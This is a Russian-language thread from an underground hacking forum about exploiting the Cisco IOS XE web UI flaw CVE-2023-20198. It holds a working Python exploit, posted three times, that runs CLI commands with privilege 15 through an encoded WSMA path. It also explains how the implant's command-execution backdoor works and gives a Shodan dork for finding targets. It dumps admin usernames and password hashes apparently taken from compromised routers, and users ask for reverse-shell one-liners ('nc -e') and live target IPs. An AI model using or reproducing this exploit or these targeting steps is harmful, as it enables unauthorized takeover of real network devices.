• XSS.stack #1 – первый литературный журнал от юзеров форума

Web Cisco - CVE-2023-20198 обсуждение

pepel

Сасай-Кудасай
Забанен
Регистрация
20.08.2010
Сообщения
269
Реакции
295
Гарант сделки
1
Пожалуйста, обратите внимание, что пользователь заблокирован
На гитхабе уже довольно много эксплойтов с добавлением юзера и чеком на имплант.
Просмотрев их, у меня сложилось впечатление, что это фейки. Причем, некоторые не работают из-за банальных ляпов в коде.

Метод с добавлением юзера слишком тупой, не находите? Auth-bypass в POST-запросе на роуте /create_user с телом {"username":"user1", "password":"password1"}. Добавляет юзера с максимальными привелегиями? Что это за дичь? Очевидная же хрень, как такое могло стать уязвимостью вообще? Насколько в циско должны быть упоротые кодеры чтобы такое пропустить?

Но окей, допускаю что это может работать. Но в эксплойте оно никак не задействуется дальше. Имплант заливается без аутентификации. И есть особо отмоченные, кто ещё придумал свои роуты, например
https://github.com/sohaibeb/CVE-2023-20198/blob/main/CVE_CISCO_20198_V2.py
59 строка, check_url = f"{base_url}/implant_status". Откуда /implant_status? Кого /implant_status?

У меня вопрос к тем, кто уже пробовал заюзать эту багу на паблик экспах - удавалось ли вам реально добавить юзера и зайти в web-админку?
Подозреваю, что сканер импланта там работает, но это будут уже взломанные кем-то системы.
Насчет всего остального одни вопросы.
 
На гитхабе уже довольно много эксплойтов с добавлением юзера и чеком на имплант.
Просмотрев их, у меня сложилось впечатление, что это фейки. Причем, некоторые не работают из-за банальных ляпов в коде.

Метод с добавлением юзера слишком тупой, не находите? Auth-bypass в POST-запросе на роуте /create_user с телом {"username":"user1", "password":"password1"}. Добавляет юзера с максимальными привелегиями? Что это за дичь? Очевидная же хрень, как такое могло стать уязвимостью вообще? Насколько в циско должны быть упоротые кодеры чтобы такое пропустить?

Но окей, допускаю что это может работать. Но в эксплойте оно никак не задействуется дальше. Имплант заливается без аутентификации. И есть особо отмоченные, кто ещё придумал свои роуты, например
https://github.com/sohaibeb/CVE-2023-20198/blob/main/CVE_CISCO_20198_V2.py
59 строка, check_url = f"{base_url}/implant_status". Откуда /implant_status? Кого /implant_status?

У меня вопрос к тем, кто уже пробовал заюзать эту багу на паблик экспах - удавалось ли вам реально добавить юзера и зайти в web-админку?
Подозреваю, что сканер импланта там работает, но это будут уже взломанные кем-то системы.
Насчет всего остального одни вопросы.
Сам имплант судя по ресерчу выглядит так:
pasted image 0.png

что там замазано остается только гадать.
А так соглашусь, что странное что-то, если учесть ,что они уже не неделю не выпускают фикс этой цве.
UPD;
крч все поки что на гите - говно из жопы, /create_user через обычный post запрос, бёрп вообще не реагирует на url с /create_user, а возвращает на login.js)) я как понял один дибил написал по приколу, остальные повторили
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Сам имплант это настройка для nginx конфига которая создает роут /webui/logoutconfirm.html. Написан на Lua.

В импланте на скрине замазаны хеши.
Первая строка 1a80b7389ccd0a5dab, чтобы чекнуть что шелл в системе /webui/logoutconfirm.html?logon_hash=1, он вернет 1a80b7389ccd0a5dab.
Вторая строка это хэш, который даст выполнение команд двух типов. Он работает как проверка доступа, хозяин ли это делает запрос. Выглядит так
POST https://hostip/webui/logoutconfirm.html?logon_hash=хэш_для_контроля_доступа_прописан_в_импланте&common_type=значение_одно_из_двух(subsystem, iox)
POST_DATA: конмады Linux или IOS
common_type=subsystem - принимает команды уровня ОС Linux, выполняет под root (в импланте это io.popen(body, "r"))
common_type=iox - принимает команды уровня IOS (прошивка), выполняет под юзером с высшими привилегиями (делает локальный post-запрос на /lua5 c хидером Priv-level: 15)

В ответ он выдаёт content, с результатом отработки команд из POST_DATA
И как видишь, роута /implant_status там нету
я как понял один дибил написал по приколу, остальные повторили
я тоже так думаю
 
Последнее редактирование:
много POC гулает но во всех них не учтены важные шаги в аккаунт creation процессе. может ли кто-нибудь объяснить мне, как второя цве используется для импланта?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
много POC гулает но во всех них не учтены важные шаги в аккаунт creation процессе.
тебе что-нибудь известно про эти шаги? Говоришь так, будто что-то знаешь)
 
тебе что-нибудь известно про эти шаги? Говоришь так, будто что-то знаешь)
вижу проблему в теме в соц мидии
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Короче, они сами не поняли как создается юзер)
Ну да, конечно
Screenshot-2023-10-30-at-2.50.55-PM.png.webp
 
Код:
import sys

import requests
requests.packages.urllib3.disable_warnings()
def exploit(url,command):
    endpoint = "http://" + url+ "/%2577ebui_wsma_http"
    header = {
        "Host": f"{url}",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Priv-Level": "15"
    }
    data = f'''
<?xml version="1.0" encoding="UTF-8"?><SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken SOAP:mustUnderstand="false">
<wsse:Username>
gangbang
</wsse:Username>
<wsse:Password>
gangbang
</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body><request correlator="exec1" xmlns="urn:cisco:wsma-exec"><execCLI xsd="false"><cmd>
{command}
</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>
    '''
    response = requests.post(endpoint, data=data, headers=header, verify=False, timeout=5)
    print(response.text)



exploit(sys.argv[1], sys.argv[2])


Donation

BTC: bc1qrxgsmzny8hszwtp7tt7jtwamwyck7nlv07j9jn
 
Код:
import sys

import requests
requests.packages.urllib3.disable_warnings()
def exploit(url,command):
    endpoint = "http://" + url+ "/%2577ebui_wsma_http"
    header = {
        "Host": f"{url}",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Priv-Level": "15"
    }
    data = f'''
<?xml version="1.0" encoding="UTF-8"?><SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken SOAP:mustUnderstand="false">
<wsse:Username>
gangbang
</wsse:Username>
<wsse:Password>
gangbang
</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body><request correlator="exec1" xmlns="urn:cisco:wsma-exec"><execCLI xsd="false"><cmd>
{command}
</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>
    '''
    response = requests.post(endpoint, data=data, headers=header, verify=False, timeout=5)
    print(response.text)



exploit(sys.argv[1], sys.argv[2])
 
Код:
import sys

import requests
requests.packages.urllib3.disable_warnings()
def exploit(url,command):
    endpoint = "http://" + url+ "/%2577ebui_wsma_http"
    header = {
        "Host": f"{url}",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Priv-Level": "15"
    }
    data = f'''
<?xml version="1.0" encoding="UTF-8"?><SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAPENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken SOAP:mustUnderstand="false">
<wsse:Username>
gangbang
</wsse:Username>
<wsse:Password>
gangbang
</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body><request correlator="exec1" xmlns="urn:cisco:wsma-exec"><execCLI xsd="false"><cmd>
{command}
</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>
    '''
    response = requests.post(endpoint, data=data, headers=header, verify=False, timeout=5)
    print(response.text)



exploit(sys.argv[1], sys.argv[2])


Donation

BTC: bc1qrxgsmzny8hszwtp7tt7jtwamwyck7nlv07j9jn
looks we have a approval. give a like. enjoy happy hacking. Let me know if anyone can give reverse shell uitility like "nc -e <ip> <port>"
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Собсно, не хайпа ради, но у мну наконец-то получилось попасть в админку. Это было довольно запарно, найти всю инфу и собрать её в рабочее решение. Циски очень ебанутые системы, я вам доложу)
Мне пишут люди насчет таргетов для тестов, шодан их выдаёт по дорку http.html_hash:1076109428
Кстати, через этот же эксплойт их можно тупо "отключить от взлома" отрубив веб-интерфейс. Я так запорол один тестовый хост)
У них разделяются команды по типу исполнения (execution и configuration), поэтому по отдельности запрос на скриншоте выше и код "эксплойта" пиндоса не дадут эффект. Их нужно сочетать и сделать "кое-что" ещё)

Кто-то по соседству тоже тесты проводил. Спамят созданием юзеров (random name 7 длина) xD
Код:
username uversatelecom privilege 15 secret 5 $1$bvaQ$eLwmHdc1.MbmsEnt/OhME.
username csicoadmin privilege 15 secret 5 $1$WpNr$VBgaqBvJiYF09wkZghqWb0
username bauser privilege 15 secret 5 $1$CjCX$BkaRJOs/8pychNHJbGriN1
username admin privilege 15 secret 5 $1$pTGw$eleLqp/YC/tF840gqq3gb1
username cisco_support privilege 15 secret 8 $8$Ia13kKNlx9i3lx$/jhBsBZ/h9kQXFBMfn/wcAlKLtIdjbH2C6G3I2coX6.
username 9ism3ti privilege 15 secret 5 $1$Xaj2$4trROzVoqAvAyVwgHIJa9.
username twevtxs privilege 15 secret 5 $1$WB.U$49fHMv2rIZWEIhmMaRaZX1
username ge9klwo privilege 15 secret 5 $1$jqKB$Sz35k7m.cSQQ1fa2zYAYM1
username wxfh0a6 privilege 15 secret 5 $1$McDk$pbaoUNEAhRm2OQFQaerIq/
username mzbs9e8 privilege 15 secret 5 $1$drVq$.kPalkUa07E8.Hs4jtgua0
username oukbsf3 privilege 15 secret 5 $1$r2MA$G8UlfKicflRMC3MtrmBkl1
username lnxmznz privilege 15 secret 5 $1$IGwH$gEmX.yuKivOUELqORUyIa/
username 0i3qusp privilege 15 secret 5 $1$IiXS$gmLxIlgEBrjmFjBA28NIu/
username s1xefgb privilege 15 secret 5 $1$M95v$89Lc2XrOE7DcqwcRcOXgG/
username x0fztvo privilege 15 secret 5 $1$9SE7$5DUHtbKgkp0gFHJfEM4BZ.
username s3c8iyw privilege 15 secret 5 $1$i0fd$U0Q.3b7aY4iB7U.VFDOBi1
username faiulyk privilege 15 secret 5 $1$4XfA$qmJGSXjI70edmStBh/amW/
username gfqfrnn privilege 15 secret 5 $1$JDmx$CuCl76dQ6gOsEMLL3h95l/
username im6yxqp privilege 15 secret 5 $1$Y4fi$Qi2/6cxVYce/okCnkkP9x1
username gypxfaf privilege 15 secret 5 $1$zgB/$BPhVjcpVnGMPKJ6upPE2i.
username km29sfe privilege 15 secret 5 $1$L9Sn$dUjPlJkHPMamCltbkrNxH1
username aeo1gut privilege 15 secret 5 $1$Cnc7$E5hmaTYnSWaUHKs/U335i1
username mizhmrb privilege 15 secret 5 $1$cUJR$ybqooxKDJlS9GxMWnvSlT0
username mbnn8pg privilege 15 secret 5 $1$R5j.$QiOWSpqurl/ye5IqJPQEp1
username wf3dlto privilege 15 secret 5 $1$daas$RlnNOrblp7f0aguxBjtO./
username e4k5o0i privilege 15 secret 5 $1$ihot$2WAg0wP0NYmHzh5NvMRGI.
username ruhb3eq privilege 15 secret 5 $1$E2IL$F1VIeXK9x3dRy13VRVDzG0
username d8exvon privilege 15 secret 5 $1$orgY$lC1Pff4lYY4T4jndlN6/q/
username uirlglv privilege 15 secret 5 $1$/e5x$GrKiJi3Mn0E1ayp8rXCEW.
username alcgk9a privilege 15 secret 5 $1$tDCI$nANF07SVcI6pecDXzBYj.0
username 5hjup0s privilege 15 secret 5 $1$.KPO$AUoaw7pmV/jsW5f1p3zOq0
username ouxygpi privilege 15 secret 5 $1$bHXA$l7KoSmFOa9tWkb3HyxyhH1
username ijgoh3z privilege 15 secret 5 $1$bmOq$ESDH55SSmmDJaYaNo576R/
username 4yxwgkg privilege 15 secret 5 $1$vvUM$X0URg8RV4v2wZpF4SYQEN0
username 2tq7obf privilege 15 secret 5 $1$PDcv$4Uia/J14Zknm2mZgr4F1t/
username rnmg5qs privilege 15 secret 5 $1$VM7l$jUXSEQFqkB7KGEv.XmzQN1
username qtafexn privilege 15 secret 5 $1$Ljif$hupRC9QbUFszWsy50KkvZ1
username gryaz7r privilege 15 secret 5 $1$Y9GZ$wAOq597RpRapvfnqmaCiT.
username 05fd6pf privilege 15 secret 5 $1$2XNr$klNn/Aqrnxq3t/yw71Uw3.
username n8qitcf privilege 15 secret 5 $1$wF0x$wwwsD4XaJTDojp2AT0Vfg/
username nml6bz9 privilege 15 secret 5 $1$6yaX$7X.ouYQHV5RVfZhHtdOJv/
username dnqrjsb privilege 15 secret 5 $1$0IGy$CANhZjsYAGm4PkNG8UlAX.
username nfsvamb privilege 15 secret 5 $1$Bz7A$CMqip83aCp3N.9.sD0NAU0
username bkjsuch privilege 15 secret 5 $1$3fpi$5236hYm5bTUPXQDEKFwpM/
username ppchtqu privilege 15 secret 5 $1$jCrr$ZxJAWBoTbvzbSzykE/IV4/
username dp1flw0 privilege 15 secret 5 $1$cGZH$0A29mrjZwFGrKL9z85aA91
username kmo3bmu privilege 15 secret 5 $1$4yHh$a66Mn3EE8.x6cGoLBlyaq1
username qbotve2 privilege 15 secret 5 $1$JLzA$mteUfUYwsXlYXUfqvWCXh0
username smyx4u5 privilege 15 secret 5 $1$1BiU$SwZHg.JXbzM8zeUgFSz/00
username eu6ptgz privilege 15 secret 5 $1$IzHE$Z.VB0nVVjWx3J/H3DxJ.2/
username w5vbu0u privilege 15 secret 5 $1$XUjT$yqP6qK9fX2LibsKNNd7Bz.
username sgnyxbc privilege 15 secret 5 $1$P4IB$UzfL74Ixjk08Qm.g3VD3U0
username caxs9hy privilege 15 secret 5 $1$BvqW$6UnBpaYkkVGBkW3SSotq5/
username smwne24 privilege 15 secret 5 $1$sUeB$kQuw0CBBbOIknQ7.hmrx21
username p540gu8 privilege 15 secret 5 $1$uNQn$V5L.eiC2adIJOCwis.2hM.
username 68vzcn3 privilege 15 secret 5 $1$rp8L$6UJ6.xK40M/x7iW.J5F.u.
username ftpwdyv privilege 15 secret 5 $1$MaTr$dpTTVHyfzLGZNKJMkXR330
username 2h6qc8p privilege 15 secret 5 $1$yVa8$AFNArZ6p84yMJKZlHRxWl0
username h8g2fat privilege 15 secret 5 $1$iDEu$g2fDwSRm4ZjgE3nK.RG8F0
username vwykzyj privilege 15 secret 5 $1$ZFD5$tcUunG3PXRk5HJdXIJYMQ/
username wlx31mh privilege 15 secret 5 $1$79wW$xgTPnC3CXrDx/1lI2X7MA.
username 5tjpbph privilege 15 secret 5 $1$qoP7$3EsVFOV024Bp6I.4O7pGy/
username jhzf3si privilege 15 secret 5 $1$/PhS$iL88qiQ9MIo4izjxMMjyV0
username p8pftgr privilege 15 secret 5 $1$TNU2$DPizGIAPKwNitDbdISeR10
username lcmnksg privilege 15 secret 5 $1$wXMN$HZzmtfkAetXMje8hP4i69.
username ry13uxu privilege 15 secret 5 $1$Mrb.$C7RJB0zGs394gr8rCNh810
username mf5in94 privilege 15 secret 5 $1$kpxi$o8SXyESYTMBkfz7n9ckXb0
username 6s4rbqd privilege 15 secret 5 $1$ndXQ$YhBnqlhnxQPYZBKB.duzH/
username 9ucorl2 privilege 15 secret 5 $1$bjrg$qHhkARUcvwK5JB5Q24XZV1
username ojzmpev privilege 15 secret 5 $1$HK3V$7IufB.G5Ci6w03DSEZR4i0
 
Последнее редактирование:
how to get a reverse shell I was able to execute command

Initial access and implant delivery​

The CVE-2023-20198 vulnerability received the highest Common Vulnerability Scoring System (CVSS) score (10/critical). Successful exploitation allows the attacker to gain access to the device with full administrator privileges. After compromising the device, we observed the adversary exploit a second vulnerability (CVE-2023-20273), which affects another component of the Web UI feature, to install the implant. This allows the attacker to run arbitrary commands with elevated (root) privileges, thereby effectively taking full control of the device. In this particular attack, the actor then used the ability to run arbitrary commands to write the implant to the file system. CVE-2023-20273 has a CVSS score of 7.2 (high). We identified the CVE-2023-20273 activity by leveraging existing Cisco protections.

Implant analysis​

The implant is based on the Lua programming language and consists of 29 lines of code that facilitates the arbitrary command execution. The attacker must create an HTTP POST request to the device, which delivers the following three functions (Figure 1):

  1. The first function is dictated by the “menu” parameter, which must exist and must be non-empty. This returns a string of numbers surrounded by forward-slashes, which we believe represents the implant's version.
  2. The second function is dictated by the “logon_hash” parameter, which must be set to “1”. This returns an 18-character hexadecimal string that is hardcoded into the implant.
  3. The third function is also dictated by the “logon_hash” parameter, which checks to see if the parameter matches a 40-character hexadecimal string that is hardcoded into the implant. A second parameter used here is “common_type”, which must be non-empty, and whose value determines whether the code is executed at the system level or IOS level. If the code is executed at the system level, this parameter must be set to “subsystem”, and if it is executed at the IOS level, the parameter must be “iox”. The IOX commands are executed at privilege level 15.



 
Собсно, не хайпа ради, но у мну наконец-то поличолось попасть в админку. Это было довольно запарно, найти всю инфу и собрать её в рабочее решение. Циски очень ебанутые системы, я вам доложу)
Мне пишут люди насчет таргетов для тестов, шодан их выдаёт по дорку http.html_hash:1076109428
Кстати, через этот же эксплойт их можно тупо "отключить от взлома" отрубив веб-интерфейс. Я так запорол один тестовый хост)
У них разделяются команды по типу исполнения (execution и configuration), поэтому по отдельности запрос на скриншоте выше и код "эксплойта" пиндоса не дадут эффект. Их нужно сочетать и сделать "кое-что" ещё)

Кто-то по соседству тоже тесты проводил. Спамят созданием юзеров (random name 7 длина) xD
Код:
username uversatelecom privilege 15 secret 5 $1$bvaQ$eLwmHdc1.MbmsEnt/OhME.
username csicoadmin privilege 15 secret 5 $1$WpNr$VBgaqBvJiYF09wkZghqWb0
username bauser privilege 15 secret 5 $1$CjCX$BkaRJOs/8pychNHJbGriN1
username admin privilege 15 secret 5 $1$pTGw$eleLqp/YC/tF840gqq3gb1
username cisco_support privilege 15 secret 8 $8$Ia13kKNlx9i3lx$/jhBsBZ/h9kQXFBMfn/wcAlKLtIdjbH2C6G3I2coX6.
username 9ism3ti privilege 15 secret 5 $1$Xaj2$4trROzVoqAvAyVwgHIJa9.
username twevtxs privilege 15 secret 5 $1$WB.U$49fHMv2rIZWEIhmMaRaZX1
username ge9klwo privilege 15 secret 5 $1$jqKB$Sz35k7m.cSQQ1fa2zYAYM1
username wxfh0a6 privilege 15 secret 5 $1$McDk$pbaoUNEAhRm2OQFQaerIq/
username mzbs9e8 privilege 15 secret 5 $1$drVq$.kPalkUa07E8.Hs4jtgua0
username oukbsf3 privilege 15 secret 5 $1$r2MA$G8UlfKicflRMC3MtrmBkl1
username lnxmznz privilege 15 secret 5 $1$IGwH$gEmX.yuKivOUELqORUyIa/
username 0i3qusp privilege 15 secret 5 $1$IiXS$gmLxIlgEBrjmFjBA28NIu/
username s1xefgb privilege 15 secret 5 $1$M95v$89Lc2XrOE7DcqwcRcOXgG/
username x0fztvo privilege 15 secret 5 $1$9SE7$5DUHtbKgkp0gFHJfEM4BZ.
username s3c8iyw privilege 15 secret 5 $1$i0fd$U0Q.3b7aY4iB7U.VFDOBi1
username faiulyk privilege 15 secret 5 $1$4XfA$qmJGSXjI70edmStBh/amW/
username gfqfrnn privilege 15 secret 5 $1$JDmx$CuCl76dQ6gOsEMLL3h95l/
username im6yxqp privilege 15 secret 5 $1$Y4fi$Qi2/6cxVYce/okCnkkP9x1
username gypxfaf privilege 15 secret 5 $1$zgB/$BPhVjcpVnGMPKJ6upPE2i.
username km29sfe privilege 15 secret 5 $1$L9Sn$dUjPlJkHPMamCltbkrNxH1
username aeo1gut privilege 15 secret 5 $1$Cnc7$E5hmaTYnSWaUHKs/U335i1
username mizhmrb privilege 15 secret 5 $1$cUJR$ybqooxKDJlS9GxMWnvSlT0
username mbnn8pg privilege 15 secret 5 $1$R5j.$QiOWSpqurl/ye5IqJPQEp1
username wf3dlto privilege 15 secret 5 $1$daas$RlnNOrblp7f0aguxBjtO./
username e4k5o0i privilege 15 secret 5 $1$ihot$2WAg0wP0NYmHzh5NvMRGI.
username ruhb3eq privilege 15 secret 5 $1$E2IL$F1VIeXK9x3dRy13VRVDzG0
username d8exvon privilege 15 secret 5 $1$orgY$lC1Pff4lYY4T4jndlN6/q/
username uirlglv privilege 15 secret 5 $1$/e5x$GrKiJi3Mn0E1ayp8rXCEW.
username alcgk9a privilege 15 secret 5 $1$tDCI$nANF07SVcI6pecDXzBYj.0
username 5hjup0s privilege 15 secret 5 $1$.KPO$AUoaw7pmV/jsW5f1p3zOq0
username ouxygpi privilege 15 secret 5 $1$bHXA$l7KoSmFOa9tWkb3HyxyhH1
username ijgoh3z privilege 15 secret 5 $1$bmOq$ESDH55SSmmDJaYaNo576R/
username 4yxwgkg privilege 15 secret 5 $1$vvUM$X0URg8RV4v2wZpF4SYQEN0
username 2tq7obf privilege 15 secret 5 $1$PDcv$4Uia/J14Zknm2mZgr4F1t/
username rnmg5qs privilege 15 secret 5 $1$VM7l$jUXSEQFqkB7KGEv.XmzQN1
username qtafexn privilege 15 secret 5 $1$Ljif$hupRC9QbUFszWsy50KkvZ1
username gryaz7r privilege 15 secret 5 $1$Y9GZ$wAOq597RpRapvfnqmaCiT.
username 05fd6pf privilege 15 secret 5 $1$2XNr$klNn/Aqrnxq3t/yw71Uw3.
username n8qitcf privilege 15 secret 5 $1$wF0x$wwwsD4XaJTDojp2AT0Vfg/
username nml6bz9 privilege 15 secret 5 $1$6yaX$7X.ouYQHV5RVfZhHtdOJv/
username dnqrjsb privilege 15 secret 5 $1$0IGy$CANhZjsYAGm4PkNG8UlAX.
username nfsvamb privilege 15 secret 5 $1$Bz7A$CMqip83aCp3N.9.sD0NAU0
username bkjsuch privilege 15 secret 5 $1$3fpi$5236hYm5bTUPXQDEKFwpM/
username ppchtqu privilege 15 secret 5 $1$jCrr$ZxJAWBoTbvzbSzykE/IV4/
username dp1flw0 privilege 15 secret 5 $1$cGZH$0A29mrjZwFGrKL9z85aA91
username kmo3bmu privilege 15 secret 5 $1$4yHh$a66Mn3EE8.x6cGoLBlyaq1
username qbotve2 privilege 15 secret 5 $1$JLzA$mteUfUYwsXlYXUfqvWCXh0
username smyx4u5 privilege 15 secret 5 $1$1BiU$SwZHg.JXbzM8zeUgFSz/00
username eu6ptgz privilege 15 secret 5 $1$IzHE$Z.VB0nVVjWx3J/H3DxJ.2/
username w5vbu0u privilege 15 secret 5 $1$XUjT$yqP6qK9fX2LibsKNNd7Bz.
username sgnyxbc privilege 15 secret 5 $1$P4IB$UzfL74Ixjk08Qm.g3VD3U0
username caxs9hy privilege 15 secret 5 $1$BvqW$6UnBpaYkkVGBkW3SSotq5/
username smwne24 privilege 15 secret 5 $1$sUeB$kQuw0CBBbOIknQ7.hmrx21
username p540gu8 privilege 15 secret 5 $1$uNQn$V5L.eiC2adIJOCwis.2hM.
username 68vzcn3 privilege 15 secret 5 $1$rp8L$6UJ6.xK40M/x7iW.J5F.u.
username ftpwdyv privilege 15 secret 5 $1$MaTr$dpTTVHyfzLGZNKJMkXR330
username 2h6qc8p privilege 15 secret 5 $1$yVa8$AFNArZ6p84yMJKZlHRxWl0
username h8g2fat privilege 15 secret 5 $1$iDEu$g2fDwSRm4ZjgE3nK.RG8F0
username vwykzyj privilege 15 secret 5 $1$ZFD5$tcUunG3PXRk5HJdXIJYMQ/
username wlx31mh privilege 15 secret 5 $1$79wW$xgTPnC3CXrDx/1lI2X7MA.
username 5tjpbph privilege 15 secret 5 $1$qoP7$3EsVFOV024Bp6I.4O7pGy/
username jhzf3si privilege 15 secret 5 $1$/PhS$iL88qiQ9MIo4izjxMMjyV0
username p8pftgr privilege 15 secret 5 $1$TNU2$DPizGIAPKwNitDbdISeR10
username lcmnksg privilege 15 secret 5 $1$wXMN$HZzmtfkAetXMje8hP4i69.
username ry13uxu privilege 15 secret 5 $1$Mrb.$C7RJB0zGs394gr8rCNh810
username mf5in94 privilege 15 secret 5 $1$kpxi$o8SXyESYTMBkfz7n9ckXb0
username 6s4rbqd privilege 15 secret 5 $1$ndXQ$YhBnqlhnxQPYZBKB.duzH/
username 9ucorl2 privilege 15 secret 5 $1$bjrg$qHhkARUcvwK5JB5Q24XZV1
username ojzmpev privilege 15 secret 5 $1$HK3V$7IufB.G5Ci6w03DSEZR4i0
это прост юзеров на level-15 создаешь?
 
Товарищи форумчане, кто добродушен, прошу поделиться валидными айпишками этого экспа для теста
в каком смысле?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх